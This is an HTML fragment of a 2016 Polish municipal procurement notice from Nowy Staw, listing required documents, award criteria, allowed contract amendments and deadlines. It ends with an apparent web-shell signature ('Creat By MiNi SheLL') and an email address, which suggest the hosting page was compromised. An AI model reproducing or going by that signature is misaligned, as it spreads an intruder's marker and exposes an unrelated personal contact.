<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Oświadczenie, że oferowane roboty budowlane spełniają określone przez Zamawiającego wymagania.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.
2) Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, wskazanych w pkt. III.4.3.1., zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem - wystawionych nie wcześniej niż w terminach określonych w pkt. III.4.3.1.
3) Formularz ofertowy - wypełniony i podpisany przez wykonawcę.
4) Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę, o ile nie wynikają z przepisów prawa lub z przedstawionych dokumentów rejestrowych.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okres gwarancji wyrażony w pełnych miesiącach - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W związku z art. 144 ustawy Prawo Zamówień Publicznych Zamawiający przewiduje możliwość dokonania zmian w umowie:
1) w stosunku do terminu realizacji umowy:
a)z powodu działania siły wyższej uniemożliwiającej zachowanie terminu wykonania prac;
b) koniecznością wprowadzenia zmian dokumentacji projektowej, a wynikających z konieczności dostosowania zakresu robót do zmian powszechnie obowiązujących przepisów prawa;
c)zmiany przepisów powodujących konieczność uzyskania dokumentów, które te przepisy narzucają;
d)konieczności zlecenia prac dodatkowych w trybie zgodnym z przepisami Ustawy Pzp;
e)konieczność podniesienia bezpieczeństwa wykonywanych robót;
f)z powodu uzasadnionych zmian w zakresie sposobu wykonywania przedmiotu zamówienia proponowanych przez zamawiającego lub wykonawcę, jeżeli te zmiany są korzystne dla zamawiającego;
g)brakiem możliwości prowadzenia robót na skutek obiektywnych warunków klimatycznych, geologicznych, archeologicznych;
h)z powodu działania podmiotów/osób trzecich uniemożliwiających wykonanie prac, które to działania nie są spowodowane z winy którejkolwiek ze stron;
i)zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, 
w szczególności:
- nieterminowe przekazanie terenu budowy przez Zamawiającego;
- wstrzymanie robót przez Zamawiającego;
- konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej;
j)w przypadku opóźnienia związanym z uzyskaniem niezbędnych decyzji administracyjnych, zezwoleń lub uzgodnień z przyczyn niezależnych od Wykonawcy;
k)w przypadku odmowy wydania przez organy administracji wymaganych decyzji, zezwoleń lub uzgodnień na skutek błędów w dokumentacji projektowej;
l)wstrzymaniem prac budowlanych przez właściwy organ niezawinionych przez Wykonawcę;
m) inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcę skutkujące niemożliwością prowadzenia prac w szczególności:
- brak możliwości dojazdu oraz transportu materiałów na teren budowy 	spowodowany awariami, remontami lub przebudowami dróg dojazdowych;
- protesty mieszkańców;
- przerwa w dostawie energii elektrycznej, wody, gazu;
- przerwy (urlopy) w produkcji materiałów opisanych w dokumentacji projektowej;
2) w stosunku do osób:
a) zmiany osób reprezentujących w przypadku zmian organizacyjnych;
b) zmiany osób realizujących zadania pod warunkiem, że osoby te będą spełniały wymagania określone w SIWZ;
c) zmiana podwykonawcy, przy pomocy którego Wykonawca wykonuje przedmiot umowy na 	innego dysponującego co najmniej porównywalnym doświadczeniem, potencjałem technicznym  i osobowym;
3) zmiana sposobu spełnienia świadczenia
a)niedostępność na rynku materiałów lub urządzeń wskazanych w dokumentacji projektowej spowodowana zaprzestaniem produkcji lub wycofaniem z rynku tych materiałów lub urządzeń;
b)pojawienie się na rynku materiałów lub urządzeń nowszej generacji pozwalających na zaoszczędzenie kosztów realizacji przedmiotu umowy lub kosztów eksploatacji wykonanego przedmiotu umowy;
c)pojawienie się nowszej technologii wykonania zaprojektowanych robót pozwalającej na zaoszczędzenie czasu realizacji inwestycji lub kosztów wykonywanych prac, jak również kosztów eksploatacji wykonanego przedmiotu umowy;
d)konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych/ technologicznych lub materiałowych niż wskazane w dokumentacji projektowej, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem projektu;
4) inne:
a) gdy konieczność zmiany, w tym w zakresie wysokości wynagrodzenia, związana jest ze zmianą powszechnie obowiązujacych przepisów prawa, w tym w zakresie zmiany wysokości urzędowej stawki podatku VAT;
b) zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy wskutek zaistnienia przyczyn organizacyjnych lub finansowych leżących po stronie
Zamawiającego;
c) rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy; w takim przypadku wynagrodzenie przysługujące Wykonawcy zostanie pomniejszone na podstawie protokołu konieczności;
4. W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w pkt. 3 ppkt. 1 termin wykonania umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności.
5. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.
6. Wszelkie zmiany i uzupełnienia umowy wymagają formy pisemnej pod rygorem nieważności, w drodze podpisanego przez obie strony aneksu pod rygorem nieważności.
7. Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych:
1) skorzystanie z klauzul waloryzacyjnych przewidzianych w umowie na warunkach w niej określonych;
2) zmiana danych związanych z obsługą administracyjno-organizacyjną Umowy (np. zmiana numeru rachunku bankowego, zmiana dokumentów potwierdzających uregulowanie płatności wobec podwykonawców);
3) zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów miedzy Stronami.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.nowystaw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Nowym Stawie
ul. Gen. J. Bema 1
82-230 Nowy Staw
pok. 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.06.2016 godzina 12:00, miejsce: Urząd Miejski w Nowym Stawie
ul. Gen. J. Bema 1
82-230 Nowy Staw
pok. 9- sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com